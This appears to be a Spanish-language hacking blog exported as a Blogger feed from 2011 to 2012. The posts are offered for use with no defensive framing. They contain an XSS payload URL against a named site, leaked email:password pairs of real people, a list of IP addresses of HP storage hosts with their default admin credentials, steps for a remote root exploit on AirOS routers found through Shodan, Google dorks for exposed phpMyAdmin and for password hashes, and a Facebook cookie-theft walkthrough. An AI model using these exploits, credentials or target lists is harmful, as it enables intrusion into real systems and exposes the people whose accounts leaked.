<a href="http://otn.ca/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E" target="_blank">http://otn.ca/index.php?uri=%3Ca%20href=%22http://arealinux.blogspot.com/%22%3E%20%3Cimg%20src=%22http://4.bp.blogspot.com/-V6VLv7EUqfU/TieCJxQzgSI/AAAAAAAAAEM/UcIOZz7fqxY/s1600/chicho_terrmoto.jpeg%22%3E%3C/a%3E</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-11536834680554594002012-08-21T15:00:00.000-07:002012-09-01T12:58:32.037-07:00video xss no persistente<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/yMmWB5oRSN8?feature=player_embedded' frameborder='0'></iframe></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-9404361458125602912012-08-21T13:37:00.000-07:002012-08-21T13:37:09.974-07:00este enlace es muy interesante. Da los datos de una web que fue asaltada<br />
lastima que ya se cambiaron<br />
<br />
<a href="http://pastebin.com/W1FnWtND">http://pastebin.com/W1FnWtND</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-28262725755744992972012-08-21T08:55:00.000-07:002012-08-21T08:55:00.920-07:00<a href="http://www.exploit-db.com/ghdb/3789/">http://www.exploit-db.com/ghdb/3789/</a><br />
<br />
jajajja. pense que ellos pondrian mi nombre :-(( y solo publican el @ ke les mande.<br />
<br />
pa la siguiente ya lo se.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.exploit-db.com/wp-content/themes/exploit/images/exdb_logo2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="http://www.exploit-db.com/wp-content/themes/exploit/images/exdb_logo2.png" width="320" /></a></div>
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-69430117980384190152012-08-19T12:56:00.002-07:002012-08-19T12:56:58.177-07:00<ol>
<li class="li1"><div class="de1">
http://www.corriendovoy.com/index.php?seccion=1</div>
</li>
<li class="li2"><div class="de2">
</div>
</li>
<li class="li1"><div class="de1">
user:pass</div>
</li>
<li class="li2"><div class="de2">
jomacefer@hotmail.com:starwars1</div>
</li>
<li class="li1"><div class="de1">
macarthur.2008@hotmail.com:macarthur</div>
</li>
<li class="li2"><div class="de2">
imvgrupobem@hotmail.es:12081966</div>
</li>
<li class="li1"><div class="de1">
mmolpeceres@hotmail.com:41334133</div>
</li>
<li class="li2"><div class="de2">
jcanoblazquez@yahoo.es:cristine</div>
<div class="de2">
</div>
<div class="de2">
</div>
<div class="de2">
</div>
<div class="de2">
http://pastebin.com/X9LMCnwJ </div>
</li>
</ol>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-76133779713439253632012-08-19T12:54:00.001-07:002012-09-01T12:59:21.654-07:00nuevo dork preferidoeste es mi nuevo dork preferido.<br />
ya lo envie a offsec.com<br />
:-)<br />
<br />
<span style="color: red;">inurl:"phpmyadmin/index.php" intext:"[ Edit ] [ Create PHP Code ] [ Refresh ]"</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-45646611095667995782012-05-25T08:30:00.002-07:002012-05-25T08:30:52.128-07:00default pass para HP Storage Management Utility87.124.38.204 <br />85.185.176.64 <br />77.220.170.29 <br />200.145.164.6 <br />88.255.95.14 <br />212.33.237.92 <br />209.119.5.72 <br />158.193.151.85 <br />1.245.41.75 <br /> user : admin<br /> pass : !adminUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-21164604425786599602012-03-13T14:44:00.000-07:002012-03-13T14:44:24.422-07:00sidejacking<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/RRvNlu03SAc?feature=player_embedded' frameborder='0'></iframe></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-62517146430003908102012-03-12T05:58:00.000-07:002012-03-12T05:58:18.039-07:00robo de cookies con wireshark y sesion de facebookEn esta ocasión, uso la herramienta wireshark para robar la cookie de una sesión facebook, para poder hacer esto, tenemos que estar en la misma red que nuestra victima, ademas, una vez robada la cookie, tenemos que usara, no sirve para usar mas tarde.<br />
<br />
Uso la herramienta live HTTP header para modificar la cookie, quiero decir: que cambio la que mande mi navegador por la que uso la victima.<br />
<br />
<a class="bbc_link" href="http://youtu.be/ISJUacTFJtY" target="_blank"><span id="goog_1397918119"></span>http://youtu.be/ISJUacTFJtY<span id="goog_1397918120"></span></a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1521565302232306222.post-84165449276351192552011-12-28T11:09:00.000-08:002011-12-28T11:09:47.524-08:000day en AirOS (Acceso como Root)0day en AirOS (Acceso como Root)<br />
<br />
AirOS remote root 0day<br />
<br />
since some genius decided to write worm for this, here is early santa for you, kids:<br />
<br />
1. http://www.shodanhq.com/search?q=airos<br />
2. click arbitrary system<br />
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css<br />
4. profit?<br />
<br />
IRCNet opers: expect some decent KNB bot mayhem for a while :)<br />
<br />
AirOS creado por Ubiquiti se basa en un sistema operativo avanzado capaz de manejar un poderoso sistema inalámbrico y funciones de enrutamiento, desarrollado con una interfaz de usuario simple, limpia e intuitiva (a diferencia con otros sistemas). <br />
<br />
trae por defecto de fabrica: Usuario: ubnt y Contraseña: ubnt<br />
<br />
http://www.airos.com/descargas/manuales/guideAirosLinux.pdf<br />
http://wireless.orosal.es/ubnt/manual_ps2_ns2.pdf<br />
<br />
fuente:http://www.blackploit.com/<br />
<br />
Se os abrira una ventana como esta:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-cApFzrjv1rY/TvkKUTLRb0I/AAAAAAAAAdI/kE3p66W_na8/s1600/0day+en+AirOS+%25282%2529.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="http://3.bp.blogspot.com/-cApFzrjv1rY/TvkKUTLRb0I/AAAAAAAAAdI/kE3p66W_na8/s320/0day+en+AirOS+%25282%2529.bmp" width="320" /></a></div><br />
en la opcion "command line" podeis hacer "help" para ver todos los comados que corre esta OS de router. Con el comando "ls" listamos todos los archivos (como linux) con esa lista podemos acceder a la configuaracion del router.<br />
<br />
En la url: http://X.X.X.X/<span style="color: red;"></span><span style="color: red;">admin</span>.cgi/sd.css podemos sustituirlo por cualquier otro ".cgi" que veamos en ese directorio, para asi poder acceder por la web al mismo.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1521565302232306222.post-54344292982768921172011-12-06T07:01:00.000-08:002011-12-06T07:01:42.052-08:00Creamos las pass en MD5 y buscamos quien la usa :-)<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/smIP0nSkBQ8?feature=player_embedded' frameborder='0'></iframe></div>Pasamos a md5 una pass cualquiera, en este ejemplo "123456" y despues buscamos archivos en formato php que contengan las pass en formato md5<br />
<br />
en google ponemos: "e10adc3949ba59abbe56e057f20f883e" filetype:php<br />
<br />
podemos poner cualquier otra extensión tipo: php~, ini, xml, doc, txt, slq, old.sql,...Unknownnoreply@blogger.com0